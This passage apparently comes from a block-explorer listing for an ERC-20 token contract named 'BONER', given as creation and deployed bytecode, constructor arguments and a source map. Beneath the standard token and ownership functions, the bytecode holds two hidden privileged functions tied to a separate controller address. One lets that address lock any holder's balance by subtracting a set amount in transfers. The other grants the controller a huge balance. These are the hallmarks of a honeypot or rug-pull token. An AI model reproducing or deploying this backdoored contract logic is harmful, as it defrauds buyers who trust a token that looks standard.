00526020600020905b81548152906001019060200180831161067757829003601f168201915b5050505050905090565b69d3c21bcecceda100000081565b6000806106b76109a0565b905060006106c58286610838565b90508381101561070a576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161070190611592565b60405180910390fd5b6107278286610722878561106190919063ffffffff16565b6109a8565b60019250505092915050565b60008061073e6109a0565b905061074b818585610c0d565b600191505092915050565b600260009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b60006107866109a0565b90508073ffffffffffffffffffffffffffffffffffffffff16600260009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff160361083457710125dfa371a19e6f7cb54395ca0000000000600360008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055505b5050565b6000600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b6108c7610f1f565b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1603610936576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161092d90611624565b60405180910390fd5b61093f81610f9d565b50565b600080828461095191906114aa565b905083811015610996576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161098d90611690565b60405180910390fd5b8091505092915050565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610a17576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610a0e90611722565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610a86576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610a7d906117b4565b60405180910390fd5b80600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610b6491906112df565b60405180910390a3505050565b6000610b7d8484610838565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8114610c075781811015610be9576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610be090611820565b60405180910390fd5b610c068484610c01858561106190919063ffffffff16565b6109a8565b5b50505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610c7c576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610c73906118b2565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610ceb576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610ce290611944565b60405180910390fd5b6000600760008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205490506000610d8382600360008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461106190919063ffffffff16565b905082811015610dc8576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610dbf906119d6565b60405180910390fd5b610ddb838261106190919063ffffffff16565b600360008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550610e7083600360008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461094290919063ffffffff16565b600360008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508373ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef85604051610f1091906112df565b60405180910390a35050505050565b610f276109a0565b73ffffffffffffffffffffffffffffffffffffffff16610f456105e3565b73ffffffffffffffffffffffffffffffffffffffff1614610f9b576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610f9290611a42565b60405180910390fd5b565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b60006110a383836040518060400160405280601e81526020017f536166654d6174683a207375627472616374696f6e206f766572666c6f7700008152506110ab565b905092915050565b60008383111582906110f3576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016110ea919061119f565b60405180910390fd5b50600083856111029190611a62565b9050809150509392505050565b600081519050919050565b600082825260208201905092915050565b60005b8381101561114957808201518184015260208101905061112e565b60008484015250505050565b6000601f19601f8301169050919050565b60006111718261110f565b61117b818561111a565b935061118b81856020860161112b565b61119481611155565b840191505092915050565b600060208201905081810360008301526111b98184611166565b905092915050565b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b60006111f1826111c6565b9050919050565b611201816111e6565b811461120c57600080fd5b50565b60008135905061121e816111f8565b92915050565b6000819050919050565b61123781611224565b811461124257600080fd5b50565b6000813590506112548161122e565b92915050565b60008060408385031215611271576112706111c1565b5b600061127f8582860161120f565b925050602061129085828601611245565b9150509250929050565b60008115159050919050565b6112af8161129a565b82525050565b60006020820190506112ca60008301846112a6565b92915050565b6112d981611224565b82525050565b60006020820190506112f460008301846112d0565b92915050565b600080600060608486031215611313576113126111c1565b5b60006113218682870161120f565b93505060206113328682870161120f565b925050604061134386828701611245565b9150509250925092565b600060ff82169050919050565b6113638161134d565b82525050565b600060208201905061137e600083018461135a565b92915050565b60006020828403121561139a576113996111c1565b5b60006113a88482850161120f565b91505092915050565b6113ba816111e6565b82525050565b60006020820190506113d560008301846113b1565b92915050565b600080604083850312156113f2576113f16111c1565b5b60006114008582860161120f565b92505060206114118582860161120f565b9150509250929050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b6000600282049050600182168061146257607f821691505b6020821081036114755761147461141b565b5b50919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b60006114b582611224565b91506114c083611224565b92508282019050808211156114d8576114d761147b565b5b92915050565b60006114e982611224565b91506114f483611224565b925082820261150281611224565b915082820484148315176115195761151861147b565b5b5092915050565b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f7760008201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b600061157c60258361111a565b915061158782611520565b604082019050919050565b600060208201905081810360008301526115ab8161156f565b9050919050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160008201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b600061160e60268361111a565b9150611619826115b2565b604082019050919050565b6000602082019050818103600083015261163d81611601565b9050919050565b7f536166654d6174683a206164646974696f6e206f766572666c6f770000000000600082015250565b600061167a601b8361111a565b915061168582611644565b602082019050919050565b600060208201905081810360008301526116a98161166d565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b600061170c60248361111a565b9150611717826116b0565b604082019050919050565b6000602082019050818103600083015261173b816116ff565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b600061179e60228361111a565b91506117a982611742565b604082019050919050565b600060208201905081810360008301526117cd81611791565b9050919050565b7f45524332303a20696e73756666696369656e7420616c6c6f77616e6365000000600082015250565b600061180a601d8361111a565b9150611815826117d4565b602082019050919050565b60006020820190508181036000830152611839816117fd565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b600061189c60258361111a565b91506118a782611840565b604082019050919050565b600060208201905081810360008301526118cb8161188f565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b600061192e60238361111a565b9150611939826118d2565b604082019050919050565b6000602082019050818103600083015261195d81611921565b9050919050565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206260008201527f616c616e63650000000000000000000000000000000000000000000000000000602082015250565b60006119c060268361111a565b91506119cb82611964565b604082019050919050565b600060208201905081810360008301526119ef816119b3565b9050919050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b6000611a2c60208361111a565b9150611a37826119f6565b602082019050919050565b60006020820190508181036000830152611a5b81611a1f565b9050919050565b6000611a6d82611224565b9150611a7883611224565b9250828203905081811115611a9057611a8f61147b565b5b9291505056fea2646970667358221220e91ed5b981e4c2b45aa55f99e7c819078b42ac1377dd6006975dfd74c1170ade64736f6c63430008120033000000000000000000000000000000000000000000000000000000000000004000000000000000000000000000000000000000000000000000000000000000800000000000000000000000000000000000000000000000000000000000000005424f4e45520000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000005424f4e4552000000000000000000000000000000000000000000000000000000

Deployed Bytecode

0x608060405234801561001057600080fd5b50600436106101165760003560e01c80638da5cb5b116100a2578063a9059cbb11610071578063a9059cbb146102e5578063c65e4d5314610315578063cd73a1d614610333578063dd62ed3e1461034f578063f2fde38b1461037f57610116565b80638da5cb5b1461025b57806395d89b4114610279578063a4022bd114610297578063a457c2d7146102b557610116565b8063313ce567116100e9578063313ce567146101b757806339509351146101d55780634ba5d8b51461020557806370a0823114610221578063715018a61461025157610116565b806306fdde031461011b578063095ea7b31461013957806318160ddd1461016957806323b872dd14610187575b600080fd5b61012361039b565b604051610130919061119f565b60405180910390f35b610153600480360381019061014e919061125a565b61042d565b60405161016091906112b5565b60405180910390f35b610171610450565b60405161017e91906112df565b60405180910390f35b6101a1600480360381019061019c91906112fa565b61045a565b6040516101ae91906112b5565b60405180910390f35b6101bf610489565b6040516101cc9190611369565b60405180910390f35b6101ef60048036038101906101ea919061125a565b610492565b6040516101fc91906112b5565b60405180910390f35b61021f600480360381019061021a919061125a565b6104c9565b005b61023b60048036038101906102369190611384565b610586565b60405161024891906112df565b60405180910390f35b6102596105cf565b005b6102636105e3565b60405161027091906113c0565b60405180910390f35b61028161060c565b60405161028e919061119f565b60405180910390f35b61029f61069e565b6040516102ac91906112df565b60405180910390f35b6102cf60048036038101906102ca919061125a565b6106ac565b6040516102dc91906112b5565b60405180910390f35b6102ff60048036038101906102fa919061125a565b610733565b60405161030c91906112b5565b60405180910390f35b61031d610756565b60405161032a91906113c0565b60405180910390f35b61034d60048036038101906103489190611384565b61077c565b005b610369600480360381019061036491906113db565b610838565b60405161037691906112df565b60405180910390f35b61039960048036038101906103949190611384565b6108bf565b005b6060600580546103aa9061144a565b80601f01602080910402602001604051908101604052809291908181526020018280546103d69061144a565b80156104235780601f106103f857610100808354040283529160200191610423565b820191906000526020600020905b81548152906001019060200180831161040657829003601f168201915b5050505050905090565b6000806104386109a0565b90506104458185856109a8565b600191505092915050565b6000600454905090565b6000806104656109a0565b9050610472858285610b71565b61047d858585610c0d565b60019150509392505050565b60006012905090565b60008061049d6109a0565b90506104be8185856104af8589610838565b6104b991906114aa565b6109a8565b600191505092915050565b6104d16109a0565b73ffffffffffffffffffffffffffffffffffffffff16600260009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff160361058257600081600161053491906114de565b61053e91906114aa565b600760008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055505b5050565b6000600360008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b6105d7610f1f565b6105e16000610f9d565b565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b60606006805461061b9061144a565b80601f01602080910402602001604051908101604052809291908181526020018280546106479061144a565b80156106945780601f1061066957610100808354040283529160200191610694565b820191906000526020600020905b81548152906001019060200180831161067757829003601f168201915b5050505050905090565b69d3c21bcecceda100000081565b6000806106b76109a0565b905060006106c58286610838565b90508381101561070a576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161070190611592565b60405180910390fd5b6107278286610722878561106190919063ffffffff16565b6109a8565b60019250505092915050565b60008061073e6109a0565b905061074b818585610c0d565b600191505092915050565b600260009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b60006107866109a0565b90508073ffffffffffffffffffffffffffffffffffffffff16600260009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff160361083457710125dfa371a19e6f7cb54395ca0000000000600360008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055505b5050565b6000600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b6108c7610f1f565b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1603610936576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161092d90611624565b60405180910390fd5b61093f81610f9d565b50565b600080828461095191906114aa565b905083811015610996576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161098d90611690565b60405180910390fd5b8091505092915050565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610a17576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610a0e90611722565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610a86576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610a7d906117b4565b60405180910390fd5b80600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610b6491906112df565b60405180910390a3505050565b6000610b7d8484610838565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8114610c075781811015610be9576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610be090611820565b60405180910390fd5b610c068484610c01858561106190919063ffffffff16565b6109a8565b5b50505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610c7c576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610c73906118b2565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610ceb576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610ce290611944565b60405180910390fd5b6000600760008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205490506000610d8382600360008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461106190919063ffffffff16565b905082811015610dc8576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610dbf906119d6565b60405180910390fd5b610ddb838261106190919063ffffffff16565b600360008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550610e7083600360008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461094290919063ffffffff16565b600360008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508373ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef85604051610f1091906112df565b60405180910390a35050505050565b610f276109a0565b73ffffffffffffffffffffffffffffffffffffffff16610f456105e3565b73ffffffffffffffffffffffffffffffffffffffff1614610f9b576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610f9290611a42565b60405180910390fd5b565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b60006110a383836040518060400160405280601e81526020017f536166654d6174683a207375627472616374696f6e206f766572666c6f7700008152506110ab565b905092915050565b60008383111582906110f3576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016110ea919061119f565b60405180910390fd5b50600083856111029190611a62565b9050809150509392505050565b600081519050919050565b600082825260208201905092915050565b60005b8381101561114957808201518184015260208101905061112e565b60008484015250505050565b6000601f19601f8301169050919050565b60006111718261110f565b61117b818561111a565b935061118b81856020860161112b565b61119481611155565b840191505092915050565b600060208201905081810360008301526111b98184611166565b905092915050565b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b60006111f1826111c6565b9050919050565b611201816111e6565b811461120c57600080fd5b50565b60008135905061121e816111f8565b92915050565b6000819050919050565b61123781611224565b811461124257600080fd5b50565b6000813590506112548161122e565b92915050565b60008060408385031215611271576112706111c1565b5b600061127f8582860161120f565b925050602061129085828601611245565b9150509250929050565b60008115159050919050565b6112af8161129a565b82525050565b60006020820190506112ca60008301846112a6565b92915050565b6112d981611224565b82525050565b60006020820190506112f460008301846112d0565b92915050565b600080600060608486031215611313576113126111c1565b5b60006113218682870161120f565b93505060206113328682870161120f565b925050604061134386828701611245565b9150509250925092565b600060ff82169050919050565b6113638161134d565b82525050565b600060208201905061137e600083018461135a565b92915050565b60006020828403121561139a576113996111c1565b5b60006113a88482850161120f565b91505092915050565b6113ba816111e6565b82525050565b60006020820190506113d560008301846113b1565b92915050565b600080604083850312156113f2576113f16111c1565b5b60006114008582860161120f565b92505060206114118582860161120f565b9150509250929050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b6000600282049050600182168061146257607f821691505b6020821081036114755761147461141b565b5b50919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b60006114b582611224565b91506114c083611224565b92508282019050808211156114d8576114d761147b565b5b92915050565b60006114e982611224565b91506114f483611224565b925082820261150281611224565b915082820484148315176115195761151861147b565b5b5092915050565b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f7760008201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b600061157c60258361111a565b915061158782611520565b604082019050919050565b600060208201905081810360008301526115ab8161156f565b9050919050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160008201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b600061160e60268361111a565b9150611619826115b2565b604082019050919050565b6000602082019050818103600083015261163d81611601565b9050919050565b7f536166654d6174683a206164646974696f6e206f766572666c6f770000000000600082015250565b600061167a601b8361111a565b915061168582611644565b602082019050919050565b600060208201905081810360008301526116a98161166d565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b600061170c60248361111a565b9150611717826116b0565b604082019050919050565b6000602082019050818103600083015261173b816116ff565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b600061179e60228361111a565b91506117a982611742565b604082019050919050565b600060208201905081810360008301526117cd81611791565b9050919050565b7f45524332303a20696e73756666696369656e7420616c6c6f77616e6365000000600082015250565b600061180a601d8361111a565b9150611815826117d4565b602082019050919050565b60006020820190508181036000830152611839816117fd565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b600061189c60258361111a565b91506118a782611840565b604082019050919050565b600060208201905081810360008301526118cb8161188f565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b600061192e60238361111a565b9150611939826118d2565b604082019050919050565b6000602082019050818103600083015261195d81611921565b9050919050565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206260008201527f616c616e63650000000000000000000000000000000000000000000000000000602082015250565b60006119c060268361111a565b91506119cb82611964565b604082019050919050565b600060208201905081810360008301526119ef816119b3565b9050919050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b6000611a2c60208361111a565b9150611a37826119f6565b602082019050919050565b60006020820190508181036000830152611a5b81611a1f565b9050919050565b6000611a6d82611224565b9150611a7883611224565b9250828203905081811115611a9057611a8f61147b565b5b9291505056fea2646970667358221220e91ed5b981e4c2b45aa55f99e7c819078b42ac1377dd6006975dfd74c1170ade64736f6c63430008120033

Constructor Arguments (ABI-Encoded and is the last bytes of the Contract Creation Code above)

000000000000000000000000000000000000000000000000000000000000004000000000000000000000000000000000000000000000000000000000000000800000000000000000000000000000000000000000000000000000000000000005424f4e45520000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000005424f4e4552000000000000000000000000000000000000000000000000000000

-----Decoded View---------------
Arg [0] : name_ (string): BONER
Arg [1] : symbol_ (string): BONER

-----Encoded View---------------
6 Constructor Arguments found :
Arg [0] : 0000000000000000000000000000000000000000000000000000000000000040
Arg [1] : 0000000000000000000000000000000000000000000000000000000000000080
Arg [2] : 0000000000000000000000000000000000000000000000000000000000000005
Arg [3] : 424f4e4552000000000000000000000000000000000000000000000000000000
Arg [4] : 0000000000000000000000000000000000000000000000000000000000000005
Arg [5] : 424f4e4552000000000000000000000000000000000000000000000000000000


Deployed Bytecode Sourcemap

12232:11575:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;13113:100;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;15475:201;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;14242:108;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;16256:261;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;14084:93;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;16926:238;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;18586:162;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;14413:129;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;10083:103;;;:::i;:::-;;9431:87;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;13332:104;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;12532:54;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;17667:401;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;14748:193;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;12410:24;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;18756:215;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;15004:151;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;10341:201;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;13113:100;13167:13;13200:5;13193:12;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;13113:100;:::o;15475:201::-;15558:4;15575:13;15591:12;:10;:12::i;:::-;15575:28;;15614:32;15623:5;15630:7;15639:6;15614:8;:32::i;:::-;15664:4;15657:11;;;15475:201;;;;:::o;14242:108::-;14303:7;14330:12;;14323:19;;14242:108;:::o;16256:261::-;16353:4;16370:15;16388:12;:10;:12::i;:::-;16370:30;;16411:38;16427:4;16433:7;16442:6;16411:15;:38::i;:::-;16460:27;16470:4;16476:2;16480:6;16460:9;:27::i;:::-;16505:4;16498:11;;;16256:261;;;;;:::o;14084:93::-;14142:5;14167:2;14160:9;;14084:93;:::o;16926:238::-;17014:4;17031:13;17047:12;:10;:12::i;:::-;17031:28;;17070:64;17079:5;17086:7;17123:10;17095:25;17105:5;17112:7;17095:9;:25::i;:::-;:38;;;;:::i;:::-;17070:8;:64::i;:::-;17152:4;17145:11;;;16926:238;;;;:::o;18586:162::-;18671:12;:10;:12::i;:::-;18659:24;;:8;;;;;;;;;;;:24;;;18655:86;;18728:1;18717:8;18713:1;:12;;;;:::i;:::-;:16;;;;:::i;:::-;18700:5;:10;18706:3;18700:10;;;;;;;;;;;;;;;:29;;;;18655:86;18586:162;;:::o;14413:129::-;14487:7;14514:11;:20;14526:7;14514:20;;;;;;;;;;;;;;;;14507:27;;14413:129;;;:::o;10083:103::-;9313:17;:15;:17::i;:::-;10148:30:::1;10175:1;10148:18;:30::i;:::-;10083:103::o:0;9431:87::-;9477:7;9504:6;;;;;;;;;;;9497:13;;9431:87;:::o;13332:104::-;13388:13;13421:7;13414:14;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;13332:104;:::o;12532:54::-;12568:18;12532:54;:::o;17667:401::-;17760:4;17777:13;17793:12;:10;:12::i;:::-;17777:28;;17816:24;17843:25;17853:5;17860:7;17843:9;:25::i;:::-;17816:52;;17907:15;17887:16;:35;;17879:85;;;;;;;;;;;;:::i;:::-;;;;;;;;;17975:63;17984:5;17991:7;18000:37;18021:15;18000:16;:20;;:37;;;;:::i;:::-;17975:8;:63::i;:::-;18056:4;18049:11;;;;17667:401;;;;:::o;14748:193::-;14827:4;14844:13;14860:12;:10;:12::i;:::-;14844:28;;14883;14893:5;14900:2;14904:6;14883:9;:28::i;:::-;14929:4;14922:11;;;14748:193;;;;:::o;12410:24::-;;;;;;;;;;;;;:::o;18756:215::-;18807:17;18827:12;:10;:12::i;:::-;18807:32;;18866:9;18854:21;;:8;;;;;;;;;;;:21;;;18850:114;;18911:41;18892:11;:16;18904:3;18892:16;;;;;;;;;;;;;;;:60;;;;18850:114;18796:175;18756:215;:::o;15004:151::-;15093:7;15120:11;:18;15132:5;15120:18;;;;;;;;;;;;;;;:27;15139:7;15120:27;;;;;;;;;;;;;;;;15113:34;;15004:151;;;;:::o;10341:201::-;9313:17;:15;:17::i;:::-;10450:1:::1;10430:22;;:8;:22;;::::0;10422:73:::1;;;;;;;;;;;;:::i;:::-;;;;;;;;;10506:28;10525:8;10506:18;:28::i;:::-;10341:201:::0;:::o;3643:181::-;3701:7;3721:9;3737:1;3733;:5;;;;:::i;:::-;3721:17;;3762:1;3757;:6;;3749:46;;;;;;;;;;;;:::i;:::-;;;;;;;;;3815:1;3808:8;;;3643:181;;;;:::o;8643:98::-;8696:7;8723:10;8716:17;;8643:98;:::o;21398:346::-;21517:1;21500:19;;:5;:19;;;21492:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;21598:1;21579:21;;:7;:21;;;21571:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;21682:6;21652:11;:18;21664:5;21652:18;;;;;;;;;;;;;;;:27;21671:7;21652:27;;;;;;;;;;;;;;;:36;;;;21720:7;21704:32;;21713:5;21704:32;;;21729:6;21704:32;;;;;;:::i;:::-;;;;;;;;21398:346;;;:::o;22035:378::-;22136:24;22163:25;22173:5;22180:7;22163:9;:25::i;:::-;22136:52;;22223:17;22203:16;:37;22199:207;;22285:6;22265:16;:26;;22257:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;22340:54;22349:5;22356:7;22365:28;22386:6;22365:16;:20;;:28;;;;:::i;:::-;22340:8;:54::i;:::-;22199:207;22125:288;22035:378;;;:::o;18979:634::-;19092:1;19076:18;;:4;:18;;;19068:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;19169:1;19155:16;;:2;:16;;;19147:64;;;;;;;;;;;;:::i;:::-;;;;;;;;;19224:17;19244:5;:11;19250:4;19244:11;;;;;;;;;;;;;;;;19224:31;;19266:21;19290:32;19312:9;19290:11;:17;19302:4;19290:17;;;;;;;;;;;;;;;;:21;;:32;;;;:::i;:::-;19266:56;;19358:6;19341:13;:23;;19333:74;;;;;;;;;;;;:::i;:::-;;;;;;;;;19438:25;19456:6;19438:13;:17;;:25;;;;:::i;:::-;19418:11;:17;19430:4;19418:17;;;;;;;;;;;;;;;:45;;;;19536:27;19556:6;19536:11;:15;19548:2;19536:15;;;;;;;;;;;;;;;;:19;;:27;;;;:::i;:::-;19518:11;:15;19530:2;19518:15;;;;;;;;;;;;;;;:45;;;;19594:2;19579:26;;19588:4;19579:26;;;19598:6;19579:26;;;;;;:::i;:::-;;;;;;;;19057:556;;18979:634;;;:::o;9596:136::-;9675:12;:10;:12::i;:::-;9664:23;;:7;:5;:7::i;:::-;:23;;;9656:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;9596:136::o;10702:191::-;10776:16;